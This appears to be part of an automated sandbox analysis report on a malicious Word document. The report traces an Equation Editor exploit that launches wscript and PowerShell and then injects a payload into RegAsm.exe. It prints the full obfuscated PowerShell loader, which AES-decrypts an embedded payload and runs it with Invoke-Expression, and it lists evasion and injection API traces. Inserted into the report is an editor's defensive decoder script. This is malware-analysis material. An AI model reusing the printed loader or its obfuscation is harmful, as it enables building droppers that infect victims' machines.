                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: ~WRF{1F49877E-68B7-4001-A271-09D774B073D0}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

                Data Obfuscation

                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = 
'+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
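Editor's added example, not part of the Joe Sandbox report and not code from the sample: a read-only PowerShell decoder for the wscript.exe -> powershell.exe loader logged above. The logged command is cut off at `-cReP`, so the placeholder-token map is partly an assumption taken from the visible text: `CnI` -> `"` is stated by `([CHar]67+[CHar]110+[CHar]73),[CHar]34`; `e4j` -> `'` and `TMI` -> `$` are inferred from fragments such as `[Stringe4j+e4j]TMIKey` and `TMIaesManaged`. The script undoes the token layer and the `'+'` string-join layer textually (repeating until the text stops changing, because the loader nests the same trick), pulls `$chave` and `$textoCriptografadoBase64` out of the result, reproduces the sample's own AES scheme (AES-256-CBC, key = SHA-256 of the passphrase, IV = first 16 ciphertext bytes, zero padding, trailing NULs trimmed) with the .NET classes, and writes the decrypted stage to disk instead of handing it to Invoke-Expression. Function names, parameter names and the output path are the editor's choice.

```powershell
# Added example (editor's, not from the report or the sample): offline decoder for the
# obfuscated loader above. It never calls Invoke-Expression on recovered text.
# ASSUMPTION: the token map is inferred; only CnI -> " is stated by the logged command.
param(
    [Parameter(Mandatory = $true)][string] $CommandLine,   # the -command argument as logged
    [string] $OutFile = '.\stage2.ps1'                     # hypothetical output path
)

$TokenMap = [ordered]@{
    'CnI' = '"'   # confirmed by ([CHar]67+[CHar]110+[CHar]73),[CHar]34 in the logged command
    'e4j' = "'"   # inferred (e4j+e4j sits where '+' string joins would be)
    'TMI' = '$'   # inferred (TMIaesManaged, TMIKey, TMIchave ...)
}

function Undo-TokenLayer {
    # One pass: token -> character, then collapse the '+' joins that the concatenation
    # layer leaves behind (e.g. Invoke-Expressio'+'n -> Invoke-Expression).
    param([string] $Text)
    foreach ($t in $TokenMap.Keys) { $Text = $Text.Replace($t, $TokenMap[$t]) }
    return $Text.Replace("'+'", '')
}

function Expand-LoaderLayers {
    # The sample nests the trick (tokens become '+' joins after one pass), so repeat
    # until the text stops changing; the cap guards against pathological input.
    param([string] $Text, [int] $MaxRounds = 8)
    for ($i = 0; $i -lt $MaxRounds; $i++) {
        $next = Undo-TokenLayer $Text
        if ($next -eq $Text) { break }
        $Text = $next
    }
    return $Text
}

function ConvertFrom-LoaderCiphertext {
    # Mirrors the sample's Decrypt-AESEncryption: AES-256-CBC, key = SHA256(passphrase),
    # IV = first 16 bytes of the blob, zero padding, trailing NULs trimmed.
    param([string] $Base64Text, [string] $Passphrase)
    $cipherBytes = [Convert]::FromBase64String($Base64Text)
    if ($cipherBytes.Length -lt 32 -or ($cipherBytes.Length % 16) -ne 0) {
        throw "ciphertext length $($cipherBytes.Length) is not IV + whole AES blocks; the blob was probably truncated by the logger"
    }
    $sha = [System.Security.Cryptography.SHA256]::Create()
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode      = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding   = [System.Security.Cryptography.PaddingMode]::Zeros
        $aes.KeySize   = 256          # set before Key: changing KeySize regenerates Key
        $aes.BlockSize = 128
        $aes.Key = $sha.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Passphrase))
        $aes.IV  = [byte[]]($cipherBytes[0..15])
        $dec   = $aes.CreateDecryptor()
        $plain = $dec.TransformFinalBlock($cipherBytes, 16, $cipherBytes.Length - 16)
        return [System.Text.Encoding]::UTF8.GetString($plain).TrimEnd([char]0)
    } finally {
        $aes.Dispose(); $sha.Dispose()
    }
}

# 1. Strip the string-obfuscation layers without evaluating anything.
$stage1 = Expand-LoaderLayers $CommandLine

# 2. Pull the passphrase and the blob out of the now-readable stage-1 script.
$keyMatch  = [regex]::Match($stage1, '\$chave\s*=\s*"([^"]+)"')
$blobMatch = [regex]::Match($stage1, '\$textoCriptografadoBase64\s*=\s*"([^"]+)"')
if (-not ($keyMatch.Success -and $blobMatch.Success)) {
    throw 'could not locate $chave / $textoCriptografadoBase64 after deobfuscation; the token map may not fit this variant'
}

# 3. Decrypt to disk; never execute.
$stage2 = ConvertFrom-LoaderCiphertext -Base64Text $blobMatch.Groups[1].Value -Passphrase $keyMatch.Groups[1].Value
Set-Content -Path $OutFile -Value $stage2 -Encoding UTF8
Write-Host "stage 1 (deobfuscated) length: $($stage1.Length) chars"
Write-Host "stage 2 written to $OutFile ($($stage2.Length) chars)"
if ($stage2 -match 'Invoke-Expression|IEX|FromBase64String|DownloadString|Net\.WebClient') {
    Write-Host "stage 2 contains further download/execute primitives: $($Matches[0])"
}
```

Feed it the `-command` argument exactly as recorded (Sysmon Event ID 1 or Security 4688 CommandLine field), e.g. `-CommandLine (Get-Content .\cmd.txt -Raw)`. Command-line logging frequently truncates long arguments, as this report's own line does at `-cReP`; if the base64 blob was cut, FromBase64String throws or the block-length check above fails, and nothing useful can be recovered from that log alone. Because the decryption step reproduces what the sample's Decrypt-AESEncryption does, a successful run yields the exact text the loader would have passed to Invoke-Expression, which is the artifact to carry forward into the next stage of triage.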
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CB50
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_008F7BED push esp; ret 2_2_008F7BEF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_008F49FE push esp; ret 2_2_008F4ABF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_008F73FC push esp; ret 2_2_008F73FF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_008F7BF5 push esp; ret 2_2_008F7BF7
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_008F7E13 push esp; ret 2_2_008F7E23
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_008F9A2D push esp; ret 2_2_008F9A2F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_008F9A35 push esp; ret 2_2_008F9A37
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_008F714F push esp; ret 2_2_008F7213
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_008E8F44 push eax; retf 2_2_008E8F61
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_002A06BD push ebx; retf 6_2_002A06CA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00457106 push ecx; ret 8_2_00457119
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0045B11A push esp; ret 8_2_0045B141
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0045E54D push esi; ret 8_2_0045E556
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00457A28 push eax; ret 8_2_00457A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00434E56 push ecx; ret 8_2_00434E69

                Persistence and Installation Behavior

                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File dump: ~WRD0000.tmp.0.dr
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00406EB0 ShellExecuteW,URLDownloadToFileW,8_2_00406EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_0041AA4A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CB50
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040F7A7 Sleep,ExitProcess,8_2_0040F7A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,8_2_0041A748
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
                Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1427
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4125
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 9359
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: foregroundWindowGot 1635
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2712 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3184 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3188 Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3188 Thread sleep time: -3600000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3188 Thread sleep time: -600000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3248 Thread sleep count: 248 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3248 Thread sleep time: -124000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3252 Thread sleep count: 139 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3252 Thread sleep time: -417000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3304 Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3252 Thread sleep count: 9359 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3252 Thread sleep time: -28077000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_00409253
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0041C291
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0040C34D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_00409665
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0044E879 FindFirstFileExA,8_2_0044E879
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_0040880C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040783C FindFirstFileW,FindNextFileW,8_2_0040783C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_00419AF5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0040BB30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0040BD37
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_00407C97
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node graph_8-49170
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_004349F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_004432B5 mov eax, dword ptr fs:[00000030h] 8_2_004432B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00412077 GetProcessHeap,HeapFree,8_2_00412077
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00434B47 SetUnhandledExceptionFilter,8_2_00434B47
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_004349F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0043BB22
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00434FDC

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
